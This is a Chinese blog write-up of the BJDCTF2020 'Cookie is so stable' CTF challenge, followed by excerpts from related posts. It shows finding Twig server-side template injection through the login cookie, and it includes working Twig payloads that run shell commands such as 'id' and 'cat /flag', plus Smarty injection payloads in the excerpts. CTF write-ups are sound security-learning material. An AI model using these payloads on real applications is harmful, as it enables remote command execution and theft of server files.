[BJDCTF2020]Cookie is so stable 1

最新推荐文章于 2024-06-29 07:45:00 发布
最新推荐文章于 2024-06-29 07:45:00 发布
阅读量1.4k 收藏 2
点赞数 4
分类专栏: CTF 文章标签: SSTI注入 模板引擎 安全漏洞 Web安全 Twig
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44477223/article/details/115673156
版权

运用的知识点

  • SSTI注入

题目

在这里插入图片描述

解题

一开始看到题目提示cookie 先抓一个包试试在这里插入图片描述
没发现什么问题,点开另一个网页
在这里插入图片描述
感觉是注入的题目,但是sql注入没啥反应。但是你输入什么他就会回显什么
在这里插入图片描述
在这里插入图片描述
联想到SSTI注入,构造PL进行尝试:
在这里插入图片描述
发现确实能够利用SSTI
在这里插入图片描述
判断是twig,构造PL:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
在这里插入图片描述
发现不是在这里绕过,我们抓取一个登录的包
在这里插入图片描述
发现注入的点在COOKIE里面
在这里插入图片描述

注入
在这里插入图片描述
PL:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
在这里插入图片描述
关于SSTI注入的一些理解.

无独有偶o
关注
专栏目录
模板注入 [BJDCTF2020]Cookie is so stable1
m0_75178803的博客
02-23 385
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}//查看flag。{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}//查看flag。输入{{7*‘7’}},返回49表示是 Twig 模块。输入{{7*‘7’}},返回7777777表示是。
[BJDCTF2020]Cookie is so stable1
最新发布
zhi741的博客
09-12 454
得出flag 在这里我进行说明一下语句:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}:服务器端在接收用户输入后,未经充分处理就直接将其作为模板内容的一部分进行处理. 就可以猜测它是SSTI注入。什么都有没有,这下又卡住了,于是我将目光转向了题目,题目中也有Cookie的身影于是乎就有了。#获取过滤器:{{_self.env.getFilter("id")}}
[BJDCTF2020]Cookie is so stable
qq_43801002的博客
07-31 1378
题目 过程 1.Flag和Hint两个页面抓包,flag页面告诉我们要先登录,hint页面告诉我们要在cookie里面做文章 2.flag页面先登录然后抓包,发现cookie里面出现user。尝试多次后,发现是ssti注入 3.打入payload。 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} ...
[BJDCTF2020]Cookie is so stable 1(twig模板注入)
weixin_45577185的博客
09-06 380
详解模板注入漏洞 关于SSTI注入的一些理解 抓个包: 发现了两个包在cookie上的不同 判断是twig,经过测试发现是ssti注入 Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 注释:如果不抓包在页面是无法获得flag的,应该有过滤 ...
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3649
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2811
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
Chrome导出cookie的实战教程
热门推荐
weixin_43178406的博客
06-29 8万+
本文主要介绍了Chrome导出cookie的实战教程,希望能对使用Chrome的同学们有所帮助。 文章目录 1. 问题描述 2. 实战工具一 3. 实战工具二
[CTF][BJDCTF2020]Cookie is so stable 1(SSTI)
Gh0st_1n_The_Shell的博客
08-16 269
从hint.php可以找到提示,要求观察cookies 打开flag.php可以看到需要输入用户名,多次试验后发现输入的用户名会以cookies的方式储存 使用dirsearch扫描没有发现什么有用的信息,一开始以为是cookies注入,但是没有找到sql注入点 猜测用户名的回显含有ssti漏洞,于是尝试输入 {7+7} 但是发现+变成了空格,于是改为了{7*7}也没有什么反应,后面才知道要两个大括号{{7*7}} 才行 经检验发现是Twig 上网搜索Twig的payload但是套用不了,后面看别人的
[BJDCTF2020]Cookie is so stable(漏洞原理详解)
pakho_C的博客
04-18 3345
web第45题 [BJDCTF2020]Cookie is so stable 打开靶场 访问flag页面 一个输入框 访问hint页面,查看源码 提示与cookie有关 那么在flag页面输入后抓包观察 输入后显示 登陆后抓包显示为 做到这里又遇到新的知识点了,模板注入漏洞 参考大佬的博客:一篇文章带你理解漏洞之 SSTI 漏洞,讲的非常详细 漏洞原理: SSTI 怎么产生的 服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过
Twing模板注入 [BJDCTF2020]Cookie is so stable1
m0_75178803的博客
02-28 545
打开题目我们先抓包分析一下可以输入{{7*7}}处发包试一下可以看到在cookie处存在ssti模板注入输入{{7*‘7’}},返回49表示是 Twig 模块输入{{7*‘7’}},返回7777777表示是模块在这里可以看出是Twing模块我们直接用固定payload就可以得到flag。
cookie is nil
07-27
当你在编程中遇到 "cookie is nil" 的情况,通常意味着某个变量 `cookie` 被设置成了 `null` 或者空值,在许多编程语言中,包括JavaScript,它是一个表示未初始化、不存在或者已被删除的对象引用。当尝试访问这样一...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值